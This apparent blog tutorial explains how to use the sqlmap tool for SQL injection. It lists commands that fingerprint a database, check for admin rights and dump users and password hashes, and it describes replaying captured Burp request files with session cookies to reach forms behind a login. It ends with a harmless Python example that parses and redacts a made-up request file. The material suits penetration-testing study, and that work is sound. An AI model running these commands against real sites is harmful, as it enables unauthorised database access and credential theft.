Using sqlmap
This wicked tool comes with Kali and is easy to install on other Linuxes. All you need is a web form on a website as an entry point for SQL injection.
See this short “cookbook” first for quick examples of usage:
From https://securityonline.info/top-25-useful-sqlmap-commands/
Here’s the lengthy GitHub usage page:
https://github.com/sqlmapproject/sqlmap/wiki/Usage
Using Captured Headers to Get Past Authentication
You can attack injection points manually, or if you need to inject into a form that’s behind authentication, you can capture the request (headers included) using Burp, save it as a file, and let sqlmap use the parameters (like session tokens and cookies) right from that file.
You can also use the CO2 extension in Burp to pass authentication tokens:
https://security.stackexchange.com/questions/66688/login-required-before-sqlmap
sqlmap POST request injection
From https://hackertarget.com/sqlmap-post-request-injection/ :
# Parse request data and test | request data can be obtained with Burp
./sqlmap.py -r <request-file> <options>
# Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint
# Get database username, name, and hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname
# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba
# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords
From https://github.com/sqlmapproject/sqlmap/wiki/Usage :
# Supply POST data with the --data option
python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
# Manipulate cookies:
Options and switch: --cookie, --cookie-del, --load-cookies and --drop-set-cookie
https://github.com/sqlmapproject/sqlmap/wiki/Usage#http-cookie-header
And here’s a good, straightforward medium-length tutorial with examples of the major operations, like database discovery, table and column enumeration, data dumps etc.:
Or try this shorter tutorial:
https://www.sqlinjection.net/sqlmap/tutorial/
Introducing JackkTutorials. This is a great YouTube channel on lots of hacking subjects, and this 15-minute video walks you through the basics:
https://www.youtube.com/watch?v=yPMbb38pwVI&t=446s
Getting Past Authentication
Finally, here’s some discussion of using sqlmap to access (from the command line or Burp or similar) pages/forms that lie behind authentication, meaning you’ll need to pass session tokens and params with your attacks:
https://medium.com/@jonaldallan/passed-ec-councils-certified-ethical-hacker-practical-20634b6f0f2
Basically, the job is to capture a request header and use it in Burp or with
sqlmap -r headerfile.txt ...
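The saved request file holds the session cookie and any bearer token verbatim. This added example (not from the original post or the sqlmap project) parses such a file to show which fields it carries, and produces a redacted copy that can go into a report. The host, path, cookie and token values are constructed, and the set of sensitive header names is an assumption.

```python
# Added example: inspect a saved raw HTTP request, the file format `sqlmap -r` reads.
from http.cookies import SimpleCookie
from urllib.parse import parse_qsl

# Constructed sample; host, path, cookie and token values are made up.
SAMPLE_REQUEST = (
    "POST /account/search.php HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Cookie: PHPSESSID=0123456789abcdef; theme=dark\r\n"
    "Authorization: Bearer constructed.token.value\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 17\r\n"
    "\r\n"
    "id=1&submit=Query"
)

# Assumption: header names treated as credential-bearing; extend per application.
SENSITIVE_HEADERS = {"cookie", "authorization", "x-csrf-token"}

def parse_request(raw):
    """Split a raw request into method, path, headers, cookies and body params."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    jar = SimpleCookie(headers.get("cookie", ""))
    cookies = {name: morsel.value for name, morsel in jar.items()}
    params = dict(parse_qsl(body.strip(), keep_blank_values=True))
    return {"method": method, "path": path, "headers": headers,
            "cookies": cookies, "params": params}

def redact(raw):
    """Mask credential-bearing header values; leave request line and body intact."""
    head, sep, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = []
    for line in head.split("\n"):
        name, colon, _ = line.partition(":")
        if colon and name.strip().lower() in SENSITIVE_HEADERS:
            line = f"{name}: [REDACTED]"
        lines.append(line)
    return "\n".join(lines) + sep + body

if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    print(req["method"], req["path"], sorted(req["params"]), sorted(req["cookies"]))
    print(redact(SAMPLE_REQUEST))
```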